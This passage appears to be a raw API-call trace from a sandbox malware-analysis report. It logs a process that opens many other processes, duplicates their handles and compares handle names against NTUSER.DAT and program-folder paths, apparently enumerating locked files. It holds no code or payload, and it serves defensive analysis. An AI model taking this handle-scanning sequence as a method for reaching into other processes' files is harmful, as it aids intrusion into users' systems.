(_Str1="\\Microsoft Analysis Services", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0166.404] CloseHandle (hObject=0x194) returned 1 [0166.404] CloseHandle (hObject=0x1e8) returned 1 [0166.404] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7c4) returned 0x1e8 [0166.404] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.404] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.404] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.405] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.405] CloseHandle (hObject=0x1e4) returned 1 [0166.405] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.405] CloseHandle (hObject=0x194) returned 1 [0166.405] CloseHandle (hObject=0x1e8) returned 1 [0166.406] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7c4) returned 0x1e8 [0166.406] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.406] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.406] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.407] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.407] CloseHandle (hObject=0x1e4) returned 1 [0166.407] _wcsicmp (_Str1="\\Microsoft Analysis Services", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0166.407] CloseHandle (hObject=0x194) returned 1 [0166.407] CloseHandle (hObject=0x1e8) returned 1 [0166.408] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7d0) returned 0x1e8 [0166.408] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.408] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.408] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.409] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.409] CloseHandle (hObject=0x1e4) returned 1 [0166.409] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.409] CloseHandle (hObject=0x194) returned 1 [0166.409] CloseHandle (hObject=0x1e8) returned 1 [0166.409] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7d0) returned 0x1e8 [0166.409] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.410] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.412] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.416] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.416] CloseHandle (hObject=0x1e4) returned 1 [0166.416] _wcsicmp (_Str1="\\Windows NT", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.416] CloseHandle (hObject=0x194) returned 1 [0166.416] CloseHandle (hObject=0x1e8) returned 1 [0166.416] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x36c) returned 0x1e8 [0166.416] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.416] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.417] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.418] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.418] CloseHandle (hObject=0x1e4) returned 1 [0166.418] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.418] CloseHandle (hObject=0x194) returned 1 [0166.418] CloseHandle (hObject=0x1e8) returned 1 [0166.418] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x36c) returned 0x1e8 [0166.418] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.418] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.419] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.420] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.420] CloseHandle (hObject=0x1e4) returned 1 [0166.420] _wcsicmp (_Str1="\\Common Files", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -11 [0166.420] CloseHandle (hObject=0x194) returned 1 [0166.420] CloseHandle (hObject=0x1e8) returned 1 [0166.420] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x54c) returned 0x1e8 [0166.420] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.420] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.421] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.422] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.422] CloseHandle (hObject=0x1e4) returned 1 [0166.422] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.422] CloseHandle (hObject=0x194) returned 1 [0166.422] CloseHandle (hObject=0x1e8) returned 1 [0166.422] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x54c) returned 0x1e8 [0166.422] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.422] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.423] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.424] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.424] CloseHandle (hObject=0x1e4) returned 1 [0166.424] _wcsicmp (_Str1="\\Internet Explorer", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -5 [0166.424] CloseHandle (hObject=0x194) returned 1 [0166.424] CloseHandle (hObject=0x1e8) returned 1 [0166.424] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x670) returned 0x1e8 [0166.424] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.424] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.425] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.426] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.426] CloseHandle (hObject=0x1e4) returned 1 [0166.426] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.426] CloseHandle (hObject=0x194) returned 1 [0166.427] CloseHandle (hObject=0x1e8) returned 1 [0166.427] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x670) returned 0x1e8 [0166.427] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.427] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.427] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.428] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.428] CloseHandle (hObject=0x1e4) returned 1 [0166.429] _wcsicmp (_Str1="\\Reference Assemblies", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 4 [0166.429] CloseHandle (hObject=0x194) returned 1 [0166.429] CloseHandle (hObject=0x1e8) returned 1 [0166.429] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x78c) returned 0x1e8 [0166.429] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.429] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.430] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.430] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.430] CloseHandle (hObject=0x1e4) returned 1 [0166.431] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.431] CloseHandle (hObject=0x194) returned 1 [0166.431] CloseHandle (hObject=0x1e8) returned 1 [0166.431] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x78c) returned 0x1e8 [0166.431] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.431] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.432] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.432] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.433] CloseHandle (hObject=0x1e4) returned 1 [0166.433] _wcsicmp (_Str1="\\DVD Maker", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -10 [0166.433] CloseHandle (hObject=0x194) returned 1 [0166.433] CloseHandle (hObject=0x1e8) returned 1 [0166.433] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7c8) returned 0x1e8 [0166.433] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.433] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.434] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.434] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.434] CloseHandle (hObject=0x1e4) returned 1 [0166.435] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.435] CloseHandle (hObject=0x194) returned 1 [0166.435] CloseHandle (hObject=0x1e8) returned 1 [0166.435] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7c8) returned 0x1e8 [0166.435] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.435] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.436] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.436] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.437] CloseHandle (hObject=0x1e4) returned 1 [0166.437] _wcsicmp (_Str1="\\Microsoft Analysis Services", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0166.437] CloseHandle (hObject=0x194) returned 1 [0166.437] CloseHandle (hObject=0x1e8) returned 1 [0166.437] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x5cc) returned 0x1e8 [0166.437] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.437] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.438] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.439] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.439] CloseHandle (hObject=0x1e4) returned 1 [0166.439] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.439] CloseHandle (hObject=0x194) returned 1 [0166.439] CloseHandle (hObject=0x1e8) returned 1 [0166.439] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x5cc) returned 0x1e8 [0166.439] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.439] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.440] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.441] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.441] CloseHandle (hObject=0x1e4) returned 1 [0166.441] _wcsicmp (_Str1="\\Microsoft Office", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0166.441] CloseHandle (hObject=0x194) returned 1 [0166.441] CloseHandle (hObject=0x1e8) returned 1 [0166.441] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7bc) returned 0x1e8 [0166.441] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.441] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.442] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.443] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.443] CloseHandle (hObject=0x1e4) returned 1 [0166.443] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.443] CloseHandle (hObject=0x194) returned 1 [0166.443] CloseHandle (hObject=0x1e8) returned 1 [0166.443] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7bc) returned 0x1e8 [0166.443] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.443] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.444] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.445] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.445] CloseHandle (hObject=0x1e4) returned 1 [0166.445] _wcsicmp (_Str1="\\Windows NT", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.445] CloseHandle (hObject=0x194) returned 1 [0166.445] CloseHandle (hObject=0x1e8) returned 1 [0166.445] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x490) returned 0x1e8 [0166.445] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.445] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.446] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.447] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.447] CloseHandle (hObject=0x1e4) returned 1 [0166.447] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.447] CloseHandle (hObject=0x194) returned 1 [0166.447] CloseHandle (hObject=0x1e8) returned 1 [0166.447] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x490) returned 0x1e8 [0166.447] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.447] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.448] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.449] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.449] CloseHandle (hObject=0x1e4) returned 1 [0166.449] _wcsicmp (_Str1="\\Uninstall Information", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 7 [0166.449] CloseHandle (hObject=0x194) returned 1 [0166.449] CloseHandle (hObject=0x1e8) returned 1 [0166.449] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x6dc) returned 0x1e8 [0166.449] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.449] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.450] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.451] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.451] CloseHandle (hObject=0x1e4) returned 1 [0166.451] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.451] CloseHandle (hObject=0x194) returned 1 [0166.451] CloseHandle (hObject=0x1e8) returned 1 [0166.451] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x6dc) returned 0x1e8 [0166.451] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.451] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.452] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.453] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.453] CloseHandle (hObject=0x1e4) returned 1 [0166.453] _wcsicmp (_Str1="\\Windows Media Player", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.453] CloseHandle (hObject=0x194) returned 1 [0166.453] CloseHandle (hObject=0x1e8) returned 1 [0166.453] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x734) returned 0x1e8 [0166.453] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.453] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.454] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.455] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.455] CloseHandle (hObject=0x1e4) returned 1 [0166.455] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.455] CloseHandle (hObject=0x194) returned 1 [0166.455] CloseHandle (hObject=0x1e8) returned 1 [0166.455] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x734) returned 0x1e8 [0166.455] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.455] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.456] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.457] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.457] CloseHandle (hObject=0x1e4) returned 1 [0166.457] _wcsicmp (_Str1="\\Microsoft Visual Studio 8", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0166.457] CloseHandle (hObject=0x194) returned 1 [0166.457] CloseHandle (hObject=0x1e8) returned 1 [0166.457] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7e4) returned 0x1e8 [0166.457] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.457] CreateThread (in: lpThreadAttributes=0x0, 